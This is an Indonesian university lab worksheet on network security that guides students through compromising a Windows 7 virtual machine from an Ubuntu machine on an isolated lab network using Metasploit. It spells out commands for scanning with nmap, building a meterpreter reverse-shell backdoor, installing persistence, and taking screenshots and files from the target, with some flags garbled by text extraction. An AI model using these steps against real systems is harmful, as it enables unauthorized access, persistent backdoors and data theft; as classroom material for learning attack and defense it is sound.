jurnal metasploit(revisi)

14
Modul Praktek Network Security Keamanan Jaringan Telkom University 2014-2015 JURNAL PRAKTIKUM Skema Praktikum Komputer Penyerang Komputer Target Sistem Operasi - Ubuntu 12.04 IP Address - 192.168.1.2 Sistem Operasi - Windows 7 IP Address - 192.168.1.4 LANGKAH 1 Persiapkan komputer target 1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1 Centang : Nyalakan Adapter Jaringan Attached to : Jaringan Internal 1

Upload: reza-fahlevi-zulkarnaen

Post on 24-Nov-2015

120 views

Category:

Documents


7 download

TRANSCRIPT

Modul PraktekNetwork Security Keamanan JaringanTelkom University 2014-2015JURNAL PRAKTIKUMSkema PraktikumKomputer PenyerangKomputer Target

Sistem Operasi Ubuntu 12.04IP Address 192.168.1.2 Sistem Operasi Windows 7IP Address 192.168.1.4

LANGKAH 1Persiapkan komputer target1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal

Klik mulai untuk menghidupkan mesin virtual komputer target

2. Non aktifkan firewall pada komputer targetStart > Control Panel > System and Security > Windows Firewall > Costumize Setting >

3. Aktifkan remote Desktop pada komputer targetStart > Control Panel > System and Security > System > Remote settings

4. Setting IP address pada komputer targetStart > Control Panel > Network and Internet > Network and Sharing Center > Local Area Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address:IP address: 192.168.1.4Subnet mask: 255.255.255.0Default gateway: 192.168.1.1

LANGKAH 2Persiapkan komputer penyerang1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal

2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang

3. Masuk sebagai rootpraktikum@praktikum:~$ sudo su

4. Setting IP static pada komputer penyerang melalui root@praktikum:~# nano /etc/network/interfaces

Ubah isi file menjadi berikut :auto lo iface lo inet loopback

auto eth0iface eth0 inet loopbackaddress 192.168.1.3netmask 255.255.255.0network 192.168.1.0gateway 192.168.1.1broadcast 192.168.1.255

Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor 5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasiroot@praktikum:~# /etc/init.d/networking restart

LANGKAH 3Melakukan scanning dengan nmap1. Lakukan foot printing untuk mendapatkan informasi sistem targetroot@praktikum:~# nmap sS O 192.168.1.1/24 192.168.1.255/24

Output dari perintah diatas :

LANGKAH 4Uji koneksi dari komputer penyerang ke komputer target :root@praktikum:~$ ping 192.168.1.4

Output dari perintah diatas :

LANGKAH 5Pastikan apache2 dalam keadaan aktifroot@praktikum:~#/etc/init.d/apache2 restart

LANGKAH 6Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan metasploit1. Membuat payload di komputer penyerang untuk komputer target root@praktikum:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe msfconsole

Output dari perintah diatas: 2. Ketik msfconsole untuk memulai metasploit msroot@praktikum:~# msfconsole

3. Pilih payload yang sesuai dengan tujuan komputer targetmsf > use exploit/multi/handler

4. setting payload yang tepat dari sesuai dengan tujuan exploitasimsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

5. Masukan IP komputer penyerang kedalam konfigurasi

Masukan port sesuai yang direncanakan pada pembuatan backdoormsf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 666

6. Lakukan exploitasi msf exploit(handler) > exploit

7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target, masukan URL: http://192.168.1.2/praktikum.exe Klik run

Klik run

8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap instalasi backdoor, baca informasi sistem komputer targetmeterpreter > sysinfo

Output dari perintah diatas:

9. Periksa IP Address pada komputer targetmeterpreter > ifconfig

Output dari perintah diatas:

10. Instalasi backdoor pada komputer penyerang terhadap komputer targetmeterpreter >run persistence U -i 5 p 1037 r 192.168.1.2

Catatan : 1037 adalah port yang terbuka tetapi belum digunakanOutput dari perintah diatas:

Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang 11. Keluar dari aktifitas exploitasimeterpreter > exit

12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037.msf exploit(handler) > set LPORT 1037

13. Lakukan exploitasi msf exploit(handler) > exploit

secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target14. Melihat perintah yang tersedia pada meterpretermeterpreter > help

15. Lakukan screenshoot komputer targetmeterpreter > screenshot

buka hasil screenshoot diatas, berikut lokasi penyimpanan

16. Melihat posisi direktori saat inimeterpreter > pwd

Outputnya

Jika ingin pindah ke direktori yang lain, contoh :meterpreter > cd D:/

17. Download file pada komputer target meterpreter > download namafile

contoh :

Maka file akan tersimpan pada direktori dimana msfconsole dimulai 18. Lakukan restart mesin targetmeterpreter > reboot

1